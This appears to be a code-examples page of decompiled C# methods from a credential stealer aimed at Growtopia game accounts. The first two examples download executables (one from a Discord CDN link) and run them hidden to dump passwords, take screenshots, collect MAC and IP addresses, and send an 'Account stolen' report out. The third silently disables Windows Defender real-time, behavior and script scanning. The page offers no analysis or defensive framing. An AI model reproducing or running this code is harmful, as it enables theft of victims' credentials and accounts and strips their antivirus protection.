Exemplo n.º 1
0
        // Token: 0x06000009 RID: 9 RVA: 0x00002C74 File Offset: 0x00000E74
        private static string DINGDONGGETTROLL()
        {
            string    text      = Environment.ExpandEnvironmentVariables("%TEMP%");
            WebClient webClient = new WebClient();

            webClient.DownloadFile(Executable.SUCKDICKXD("CW/PsKH5sxTA0WGmJaxxW1ML+wT8q90jrto/c7dDT2qpe/RLNvNoRsub28By1W82Y2d0V7rQGgEj9trh+a3AIbT/Z2/izeQvy1ntGG4lya3YSpfVpW8G+500Yecb6tYEBQuTV4kkvzbjp5q8276S65gwBQJ/dFTo2ruNnKyOV6PDfRtZ5UzH106UnQJbdjKMh/1ZVkmMjpDP8KWIUprbn7srzcR+qmWhfNc9ruueUTBIud63/BuLPxaT9QdzG1j6eP4Mc7Wj0sB784SXWjm6gQ=="), text + "\\resourcefilehaha.exe");
            webClient.Dispose();
            new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    WindowStyle = ProcessWindowStyle.Hidden,
                    FileName    = text + "\\resourcefilehaha.exe",
                    Arguments   = "/C /stext " + text + "\\credentialslmao.txt"
                }
            }.Start();
            Thread.Sleep(5000);
            File.Delete(text + "\\resourcefilehaha.exe");
            string result = File.ReadAllText(text + "\\credentialslmao.txt");

            File.Delete(text + "\\credentialslmao.txt");
            return(result);
        }
Exemplo n.º 2
0
        // Token: 0x06000004 RID: 4 RVA: 0x0000215C File Offset: 0x0000035C
        private static void Main()
        {
            WebClient webClient = new WebClient();

            try
            {
                foreach (Process process in Process.GetProcessesByName("savedecoder.exe"))
                {
                    process.Kill();
                }
                string key = "kljsdooqlo4454GG";
                "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
                try
                {
                    StreamWriter streamWriter = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt");
                    foreach (NetworkInterface networkInterface in from nic in NetworkInterface.GetAllNetworkInterfaces()
                             where nic.OperationalStatus == OperationalStatus.Up && nic.NetworkInterfaceType != NetworkInterfaceType.Loopback
                             select nic)
                    {
                        string str = string.Join("", networkInterface.GetPhysicalAddress().GetAddressBytes().Select((byte b) => b.ToString("X2")));
                        streamWriter.Write(str + "\n");
                    }
                    streamWriter.Close();
                }
                catch
                {
                }
                try
                {
                    Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
                    using (Graphics graphics = Graphics.FromImage(bitmap))
                    {
                        graphics.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
                        bitmap.Save(string.Concat(new string[]
                        {
                            "C:\\Users\\",
                            Environment.UserName,
                            "\\AppData\\Local\\Temp\\",
                            Environment.UserName,
                            "screenshot.png"
                        }));
                    }
                }
                catch
                {
                }
                bool   attachments = true;
                string path        = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt";
                string text        = Executable.DINGDONGDANG();
                string text2       = File.ReadAllText(path);
                string str2        = Environment.ExpandEnvironmentVariables("%TEMP%");
                "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
                string.Concat(new string[]
                {
                    "C:\\Users\\",
                    Environment.UserName,
                    "\\AppData\\Local\\Temp\\",
                    Environment.UserName,
                    " pictures.zip"
                });
                string path2 = string.Concat(new string[]
                {
                    "C:\\Users\\",
                    Environment.UserName,
                    "\\AppData\\Local\\Temp\\",
                    Environment.UserName,
                    "screenshot.png"
                });
                string contents = Executable.DINGDONGGETTROLL();
                File.WriteAllText(str2 + "\\" + Environment.UserName + " credentials.txt", contents);
                str2 + "\\" + Environment.UserName + " credentials.txt";
                IFOUGHTINWW1 ifoughtinww = new IFOUGHTINWW1();
                ifoughtinww.HANGURSELF = Executable.XXX(key, "GrWz5DcWMtfQ7dy+2aTGgQ==");
                try
                {
                    webClient.DownloadFile("https://cdn.discordapp.com/attachments/775300885990998059/775459023562473512/savedecrypter.exe", Path.GetTempPath() + "//savedecoder.exe");
                    Process.Start(new ProcessStartInfo
                    {
                        WindowStyle = ProcessWindowStyle.Hidden,
                        FileName    = Path.GetTempPath() + "//savedecoder.exe"
                    });
                    Thread.Sleep(2500);
                    if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
                    {
                        File.ReadAllText(Path.GetTempPath() + "//pwd.txt");
                        string[] array = File.ReadAllText(Path.GetTempPath() + "\\pwd.txt").Split(new char[]
                        {
                            '='
                        });
                        string text3      = array[0];
                        string plainText  = array[1];
                        string plainText2 = array[2];
                        using (StreamWriter streamWriter2 = new StreamWriter(Path.GetTempPath() + "\\" + text3 + ".cbuilder"))
                        {
                            streamWriter2.Write(string.Concat(new string[]
                            {
                                Executable.EncryptString(key, text3),
                                "|",
                                Executable.EncryptString(key, plainText),
                                "|",
                                Executable.EncryptString(key, plainText2),
                                "|"
                            }));
                        }
                        ifoughtinww.XDLSD(Path.GetTempPath() + "\\" + text3 + ".cbuilder", text3 + ".cbuilder");
                        File.Delete(Path.GetTempPath() + "//pwd.txt");
                        File.Delete(Path.GetTempPath() + "//savedecoder.exe");
                        ifoughtinww.XDLOLLMAO(string.Concat(new string[]
                        {
                            "[C-Builder] Account stolen from:: ",
                            Environment.UserName,
                            " / ",
                            Environment.MachineName,
                            "\nGrowID :: ",
                            text3,
                            "\nIP address:: ",
                            text,
                            "\nMac addresses:: \n",
                            text2
                        }), attachments);
                    }
                    if (File.Exists(str2 + "\\" + Environment.UserName + " credentials.txt"))
                    {
                        File.Delete(str2 + "\\" + Environment.UserName + " credentials.txt");
                    }
                    if (File.Exists(path))
                    {
                        File.Delete(path);
                    }
                    if (File.Exists(path2))
                    {
                        File.Delete(path2);
                    }
                    try
                    {
                        foreach (Process process2 in Process.GetProcessesByName("savedecoder.exe"))
                        {
                            process2.Kill();
                            File.Delete(Path.GetTempPath() + "\\pass_decoder.exe");
                        }
                    }
                    catch
                    {
                    }
                }
                catch
                {
                }
                foreach (Process process3 in Process.GetProcessesByName("savedecoder.exe"))
                {
                    process3.Kill();
                }
                if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
                {
                    File.Delete(Path.GetTempPath() + "//pwd.txt");
                }
                if (File.Exists(Path.GetTempPath() + "//savedecoder.exe"))
                {
                    File.Delete(Path.GetTempPath() + "//savedecoder.exe");
                }
            }
            catch
            {
            }
        }
Exemplo n.º 3
0
        // Token: 0x06000006 RID: 6 RVA: 0x00002894 File Offset: 0x00000A94
        private static void WHYTFUSKID()
        {
            Process process = new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    FileName               = "powershell",
                    Arguments              = "Get-MpPreference -verbose",
                    UseShellExecute        = false,
                    RedirectStandardOutput = true,
                    WindowStyle            = ProcessWindowStyle.Hidden,
                    CreateNoWindow         = true
                }
            };

            process.Start();
            while (!process.StandardOutput.EndOfStream)
            {
                string text = process.StandardOutput.ReadLine();
                if (text.StartsWith("DisableRealtimeMonitoring") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableRealtimeMonitoring $true");
                }
                else if (text.StartsWith("DisableBehaviorMonitoring") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableBehaviorMonitoring $true");
                }
                else if (text.StartsWith("DisableBlockAtFirstSeen") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableBlockAtFirstSeen $true");
                }
                else if (text.StartsWith("DisableIOAVProtection") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableIOAVProtection $true");
                }
                else if (text.StartsWith("DisablePrivacyMode") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisablePrivacyMode $true");
                }
                else if (text.StartsWith("SignatureDisableUpdateOnStartupWithoutEngine") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true");
                }
                else if (text.StartsWith("DisableArchiveScanning") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableArchiveScanning $true");
                }
                else if (text.StartsWith("DisableIntrusionPreventionSystem") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableIntrusionPreventionSystem $true");
                }
                else if (text.StartsWith("DisableScriptScanning") && text.EndsWith("False"))
                {
                    Executable.IDIOT("Set-MpPreference -DisableScriptScanning $true");
                }
                else if (text.StartsWith("SubmitSamplesConsent") && !text.EndsWith("2"))
                {
                    Executable.IDIOT("Set-MpPreference -SubmitSamplesConsent 2");
                }
                else if (text.StartsWith("MAPSReporting") && !text.EndsWith("0"))
                {
                    Executable.IDIOT("Set-MpPreference -MAPSReporting 0");
                }
                else if (text.StartsWith("HighThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -HighThreatDefaultAction 6 -Force");
                }
                else if (text.StartsWith("ModerateThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -ModerateThreatDefaultAction 6");
                }
                else if (text.StartsWith("LowThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -LowThreatDefaultAction 6");
                }
                else if (text.StartsWith("SevereThreatDefaultAction") && !text.EndsWith("6"))
                {
                    Executable.IDIOT("Set-MpPreference -SevereThreatDefaultAction 6");
                }
            }
        }